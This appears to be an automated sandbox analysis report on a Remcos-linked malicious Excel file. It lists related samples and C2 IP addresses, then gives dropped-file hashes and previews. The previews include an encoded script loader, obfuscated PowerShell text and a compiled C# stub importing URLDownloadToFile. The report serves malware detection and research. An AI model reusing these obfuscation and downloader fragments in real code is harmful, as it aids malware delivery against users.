 | another.rtf | Get hash | malicious | Remcos | Browse | 178.237.33.50
 | rnr.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
 | thrylPXnvfySmGN.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
 | SecuriteInfo.com.BackDoor.AgentTeslaNET.37.11054.31488.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
 | PRICE REQUEST RSM PQ24.docx.doc | Get hash | malicious | Remcos | Browse | 178.237.33.50
 | Faktura.vbs | Get hash | malicious | Remcos | Browse | 178.237.33.50
 | M12_20240821.xls | Get hash | malicious | Remcos | Browse | 178.237.33.50
HETZNER-ASDE | RFQ No. 109078906v.xla.xlsx | Get hash | malicious | Remcos | Browse | 88.99.66.38
 | ZKB - Zahlungsbest#U00e4tigung an 20240828.pdf.exe | Get hash | malicious | Quasar | Browse | 195.201.57.90
 | file.exe | Get hash | malicious | LummaC, Vidar | Browse | 94.130.188.148
 | file.exe | Get hash | malicious | LummaC, Vidar | Browse | 94.130.188.148
 | file.exe | Get hash | malicious | LummaC, Vidar | Browse | 94.130.188.148
 | Setup.exe | Get hash | malicious | Vidar | Browse | 94.130.188.148
 | file.exe | Get hash | malicious | Vidar | Browse | 94.130.188.148
 | Vak#U0131fBank - #U00d6deme onay makbuzu 20240826.pdf.exe | Get hash | malicious | Quasar | Browse | 195.201.57.90
 | Faktura.vbs | Get hash | malicious | Remcos | Browse | 135.181.213.52
 | M12_20240821.xls | Get hash | malicious | Remcos | Browse | 88.99.66.38
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
05af1f5ca1b87cc9cc9b25185115607d | RFQ No. 109078906v.xla.xlsx | Get hash | malicious | Remcos | Browse | 207.241.232.154
 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtf | Get hash | malicious | Remcos | Browse | 207.241.232.154
 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtf | Get hash | malicious | Remcos | Browse | 207.241.232.154
 | another.rtf | Get hash | malicious | Remcos | Browse | 207.241.232.154
 | M12_20240821.xls | Get hash | malicious | Remcos | Browse | 207.241.232.154
 | PO_20931.xls | Get hash | malicious | Remcos | Browse | 207.241.232.154
 | 350.xls | Get hash | malicious | FormBook | Browse | 207.241.232.154
 | PO082724.xls | Get hash | malicious | Remcos | Browse | 207.241.232.154
 | PA-INV0230824 AUG.xla.xlsx | Get hash | malicious | Remcos | Browse | 207.241.232.154
 | RFQ No. 109078906v.xla.xlsx | Get hash | malicious | Remcos | Browse | 207.241.232.154
7dcce5b76c8b17472d024758970a406b | RFQ No. 109078906v.xla.xlsx | Get hash | malicious | Remcos | Browse | 88.99.66.38
 | RFQ No. 109078906.xla.xlsx | Get hash | malicious | Unknown | Browse | 88.99.66.38
 | M12_20240821.xls | Get hash | malicious | Remcos | Browse | 88.99.66.38
 | RFQ No. 109078906.xla.xlsx | Get hash | malicious | Unknown | Browse | 88.99.66.38
 | PO_20931.xls | Get hash | malicious | Remcos | Browse | 88.99.66.38
 | 350.xls | Get hash | malicious | FormBook | Browse | 88.99.66.38
 | PO082724.xls | Get hash | malicious | Remcos | Browse | 88.99.66.38
 | Inv 30532.xls | Get hash | malicious | Remcos | Browse | 88.99.66.38
 | PA-INV0230824 AUG.xla.xlsx | Get hash | malicious | Remcos | Browse | 88.99.66.38
 | RFQ No. 109078906v.xla.xlsx | Get hash | malicious | Remcos | Browse | 88.99.66.38

No context

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 15189
Entropy (8bit): 5.0343247648743
Encrypted: false
SSDEEP: 384:nWraVoGIpN6KQkj2Lkjh4iUxTnaVjvCnS/OdBmRWDf:nW+V3IpNBQkj2Oh4iUxDaVjvCnS/OdBD
MD5: 7BC3FB6565E144A52C5F44408D5D80DF
SHA1: C3C443BF9F29EAA84B0A580FD5469F4C5CC57F77
SHA-256: EF6A75C051D70322EDCD5A89E6398CC00E3D860E87A0C7981310D30837CBA495
SHA-512: D0A936BAF2277884518EDF4729F88DA74C7BAA5BBB58C1060CE66DE92A23694EA993CA69D8820816C5D28182E9A38EE59DE821EE3A73F0D85DBBC74D406285A5
Malicious: false
                                                      Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........V.7...?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet.........._.7...[...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSWorkflowUtility\

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 0.34726597513537405
Encrypted: false
SSDEEP: 3:Nlll:Nll
MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA1: 36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512: A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious: false
                                                      Preview:@...e...........................................................

Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
Category: modified
Size (bytes): 117939
Entropy (8bit): 2.172108685772815
Encrypted: false
SSDEEP: 48:7oa+apd7Ah23jlGNlhs+iKW+sRiMHsgSb799Dd7nAZbVUdZdbR8oq+Ajb5LhxmsU:Ea+M7kNcLHRgga7flnOaw5AT
MD5: 82E8D7775023BF6AC1427CF1B766F2EF
SHA1: DC0434C418831753A94CDB7B6F40F65BAA3F657E
SHA-256: 93E15BB8B41CA4DDD2F3D5A092C05BE2627AE9EE11E66ED1D4FED4E634C19418
SHA-512: 4C184C78897D32A18C94EF2E546E3256A21380E4F54BB737AB8D5D085C859D302B2220E2669C3EA52A65D6F8F89EB98EC3B77589CDE805C9F41FF0F9DC945400
Malicious: true
                                                      Preview:<script>.. ..document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%252520content%25253D%252522IE%25253DEmulateIE8%252522%252520%25253E%25250A%25253Chtml%25253E%25250A%25253Cbody%25253E%25250A%25253CSCript%252520type%25253D%252522TExT/VBSCrIpt%252522%25253E%25250Adim%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2525

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 182074
Entropy (8bit): 3.839212582497392
Encrypted: false
SSDEEP: 3072:hGhbpF6rvZuVP8rpnVoipBqWxpgt5pfGwLU40y7ND3/Mua+LhrNkY:whKrvcVUrJVocBFSUAD30j+L9+Y
MD5: 825926FCCB7DEBB08441E8DCD4963411
SHA1: D6299F30A8C04F8AAC1650F118443756E4EFFD4A
SHA-256: 28185883247F149D31E10069DE858A3B3C7026E57D4C0D7DCAE1D87204D4573D
SHA-512: 0BBFA440423715751AC5DFCAD1094058C469496C603B3358CD07BC725BCBF340BEB69D5B4676C0BE100E3E1BB231952D85989413A283C3B03613C09B96F1DBFF
Malicious: false
                                                      Preview:......P.C.A.z.b.L.L.P.z.i. .=. .".j.e.i.G.W.R.W.o.K.c.".....t.c.H.c.Z.k.t.B.W.R. .=. .".K.W.e.x.z.A.G.c.L.r.".....W.W.W.T.S.i.S.P.q.i. .=. .".p.s.n.i.Z.c.a.K.i.A.".....e.B.m.j.Z.B.r.H.k.W. .=. .".B.c.o.k.Z.t.B.W.R.t.".....b.p.A.L.Z.B.G.C.c.p. .=. .".o.W.W.Z.k.G.d.K.p.T.".....L.Z.A.L.u.i.H.x.p.G. .=. .".W.C.h.p.L.W.K.a.W.G.".....L.p.S.I.z.k.O.d.L.t. .=. .".W.Z.K.A.U.i.d.U.K.b.".........A.N.c.H.i.U.G.n.P.p. .=. .".d.U.e.Q.e.c.P.b.L.N.".....Q.N.K.G.h.C.O.t.K.H. .=. .".t.n.e.A.L.Q.f.K.G.u.".....s.L.i.r.z.L.b.Z.m.h. .=. .".L.H.f.N.f.p.c.q.i.n.".....K.Z.u.K.m.c.L.m.j.W. .=. .".i.f.P.Z.u.l.u.W.R.k.".....z.q.m.A.K.G.t.m.h.m. .=. .".z.n.z.d.W.k.l.L.L.d.".....L.B.m.O.x.f.f.B.c.L. .=. .".C.i.x.S.f.v.W.k.b.s.".....G.t.U.n.o.L.O.h.c.i. .=. .".n.S.J.W.Z.f.v.d.x.T.".....G.L.t.L.W.R.J.K.A.K. .=. .".i.W.P.A.I.t.b.c.W.u.".....k.N.U.U.G.N.p.b.o.Q. .=. .".m.L.k.U.L.N.N.A.L.b.".....c.L.i.b.Q.G.Z.L.Q.K. .=. .".O.c.R.c.z.B.P.C.T.n.".........h.W.H.s.d.H.g.p.t.e. .=. .".u.U.e.i.R.R.R.W.u.d.".....O.u.f.c.L.H.o.

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type: JSON data
Category: dropped
Size (bytes): 962
Entropy (8bit): 5.013811273052389
Encrypted: false
SSDEEP: 12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
MD5: 18BC6D34FABB00C1E30D98E8DAEC814A
SHA1: D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
SHA-256: 862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
SHA-512: 8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
Malicious: false
                                                      Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: Windows Enhanced Metafile (EMF) image data version 0x10000
Category: dropped
Size (bytes): 4527404
Entropy (8bit): 3.8573411297737294
Encrypted: false
SSDEEP: 24576:OYNVUoJCoJeoJfoJuZLqAjBfBf6Fm+qw8W5/qIjB/Rfy5m+qw4/:OYNuoJCoJeoJfoJD
MD5: 8A188A6917AD1FA0C7F1AA20A63C8593
SHA1: 4D2270D647D4A3680B47E85501C7AB1442DDCBB2
SHA-256: 728A3D9B1BEE7CD8BAA90AA0B1A4805A93238C8F835EA685931AC676BA7EF3E3
SHA-512: 823246CAC3D8A45980CE0623C485FB0B74CE7AA68CCA37B22FEF1924685F1201298163C398688057736EC4551999B5455DB1C97ABC7DA97E5A07589CD4FD7CDF
Malicious: false
                                                      Preview:....l...............X................5.. EMF....,.E.........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...............N........... ...O...!..............?...........?................................'................ `.....%...........(.................... `.L...d...............N...........~...

Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: Windows Enhanced Metafile (EMF) image data version 0x10000
Category: dropped
Size (bytes): 4527404
Entropy (8bit): 3.8573411297737294
Encrypted: false
SSDEEP: 24576:OYNVUoJCoJeoJfoJuZLqAjBfBf6Fm+qw8W5/qIjB/Rfy5m+qw4/:OYNuoJCoJeoJfoJD
MD5: 8A188A6917AD1FA0C7F1AA20A63C8593
SHA1: 4D2270D647D4A3680B47E85501C7AB1442DDCBB2
SHA-256: 728A3D9B1BEE7CD8BAA90AA0B1A4805A93238C8F835EA685931AC676BA7EF3E3
SHA-512: 823246CAC3D8A45980CE0623C485FB0B74CE7AA68CCA37B22FEF1924685F1201298163C398688057736EC4551999B5455DB1C97ABC7DA97E5A07589CD4FD7CDF
Malicious: false
                                                      Preview:....l...............X................5.. EMF....,.E.........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...............N........... ...O...!..............?...........?................................'................ `.....%...........(.................... `.L...d...............N...........~...

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1
                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Aug 28 04:56:34 2024, 1st section name ".debug$S"
                                                      Category:dropped
                                                      Size (bytes):1328
                                                      Entropy (8bit):3.9881338082024675
                                                      Encrypted:false
                                                      SSDEEP:24:HIe9Eurl3sGxNdHdjwKdNWI+ycuZhNTakSFPNnqSqd:Vr1sGR90Kd41ulTa3fqSK
                                                      MD5:3F81460419ECEEFB92883AE4BCA861D2
                                                      SHA1:5623A058AE07D94D66B5B134F76C27288B72ADE5
                                                      SHA-256:B4D2C89C90F8BBA98E6948AB7BA390E0FCCDC9FBE145DFE28B0F63050E5934C1
                                                      SHA-512:245FF1802BF0BB73DFA61592A045AC662841BF47F853114DFCAD23426B84B0630D7A13EF5FDD9BDC8FB4312736A3C71CC267DF35A3463FA31437901AE7B3FB4D
                                                      Malicious:false
                                                      Preview:L......f.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\imlwlgjg\CSCE8D62BF91CF49AAAEBCC2A37BB3C45C.TMP................S#5..:.C..F..............4.......C:\Users\user\AppData\Local\Temp\RES89F7.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.m.l.w.l.g.j.g...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Aug 28 04:56:52 2024, 1st section name ".debug$S"
                                                      Category:dropped
                                                      Size (bytes):1328
                                                      Entropy (8bit):3.9948369603086493
                                                      Encrypted:false
                                                      SSDEEP:24:Hue9EurT0dH/wKdNWI+ycuZhNCakSqPNnqSqd:brTEoKd41ulCa3GqSK
                                                      MD5:6A7E4282A14ACFF320562AEBF3F41633
                                                      SHA1:F44FE75ACCCDED48DA906F6945A0B4789B1F008D
                                                      SHA-256:3BDD3DF1049E446644FBDA6F0950947752418AF310EFC0E043431B13FCD6E3AA
                                                      SHA-512:A2794D1131CA1B5F3C09B36AC3ADAF4AEC79C61BD7C74FB63F71908C30E690E9A47A1B2B90B0B63418759AC910DDB86DA39C825A7AED9B9D57C6E95808ABA567
                                                      Malicious:false
                                                      Preview:L......f.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\mjo4tj0d\CSC1D7DFCB3A844EFFBAC81F2560943E20.TMP..................W......Q.?..............4.......C:\Users\user\AppData\Local\Temp\RESCDF9.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.j.o.4.t.j.0.d...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1
                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                      File Type:MSVC .res
                                                      Category:dropped
                                                      Size (bytes):652
                                                      Entropy (8bit):3.0846299424073904
                                                      Encrypted:false
                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryc+ak7YnqqlfPN5Dlq5J:+RI+ycuZhNTakSFPNnqX
                                                      MD5:532335CB0D3AE243DDD5469DE9CF97DC
                                                      SHA1:70E2D6FC951DE91C444459FF4D64B2047DAB8530
                                                      SHA-256:0F7EFAB2590701395652045EA59F3FF7E4B4011C3263A0E0AA11263B88A7A643
                                                      SHA-512:B33C2269117B23C761495CB5973FB6CDBA0FB06F70A6C115614CCBF1B3DC06D74999CA2678273032C278506FD173E603D15A9504F1F4C9EB152911A6C0056053
                                                      Malicious:false
                                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.m.l.w.l.g.j.g...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...i.m.l.w.l.g.j.g...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (351)
                                                      Category:dropped
                                                      Size (bytes):469
                                                      Entropy (8bit):3.9168776922580797
                                                      Encrypted:false
                                                      SSDEEP:6:V/DsYLDS81zun8cqZNVMm7tQXReKJ8SRHy4HmvmKlW0Dbme2Oi1mYy:V/DTLDfuGZeXfHav3DuOvYy
                                                      MD5:F347D2095BBABC6430C3479994132BB6
                                                      SHA1:DA6356149A945F87B97115EB29A0A6B665A4862C
                                                      SHA-256:053B79EC2FB6EB79BFC39B418EF150F58F21132501130910976F79C4B99AD5BC
                                                      SHA-512:57DA6A9EF5099DA3A8041BA16B3161A3669FC49F1B95C89C2096B946F926A7516CF1041D2481B7E36D7F874AE02F72F13F4BA2573710B96C184CD2D4629D6630
                                                      Malicious:false
                                                      Preview:.using System;.using System.Runtime.InteropServices;..namespace MAg.{. public class vQwQONIjUcm. {. [DllImport("UrLMOn.DLL", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr vE,string tbBn,string zCrVCZth,uint jKFGSfwvaiR,IntPtr MnTOq);.. }..}.
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):369
                                                      Entropy (8bit):5.2210658734165545
                                                      Encrypted:false
                                                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23ft3n0SOHzxs7+AEszIP23ft3n0SOC:p37Lvkmb6Kzl3nrOHWZEol3nrOC
                                                      MD5:80B8997633B42D6DD4B172F16510C0EE
                                                      SHA1:986CED6F2E8FF55E3A5734696AB0E995E8DB2CB8
                                                      SHA-256:69D5C5C5774469B21B103073398A0593FD8B335AA0CEEC1CE4024DEF5F4F2044
                                                      SHA-512:C26118C487BF04C858735B7619B798FB31A48B34861869D4F4F1607A4CDE0215F87C3054A8DE564450C1603E0AE4D9E5D4CE53748034BE124462B8635C93DFF5
                                                      Malicious:true
                                                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.0.cs"
                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):3072
                                                      Entropy (8bit):2.836338550855512
                                                      Encrypted:false
                                                      SSDEEP:24:etGS6PBG5eAdF8m3Bkr19F/ntkZf4sY7XMEWI+ycuZhNTakSFPNnq:65sAdemevF/WJ4sY7XMn1ulTa3fq
                                                      MD5:F23FC5F3620553DA03F222DA6F57C22B
                                                      SHA1:B9DAFB862DDEAAF3D630E67EC2E4D28D21842696
                                                      SHA-256:4ADEF1A2C0167F52D690F660918BD6B7B8566C633E550830E7263D552DBDDA7C
                                                      SHA-512:0C0FF10C144D773595360DCC53749EE75C367AA66DC9311B1854D3ADEF59D4DEC5E0547AD75B0946CD89426F5CF5B99B3233A35695BAF48DCD428C4FF5C858F2
                                                      Malicious:false
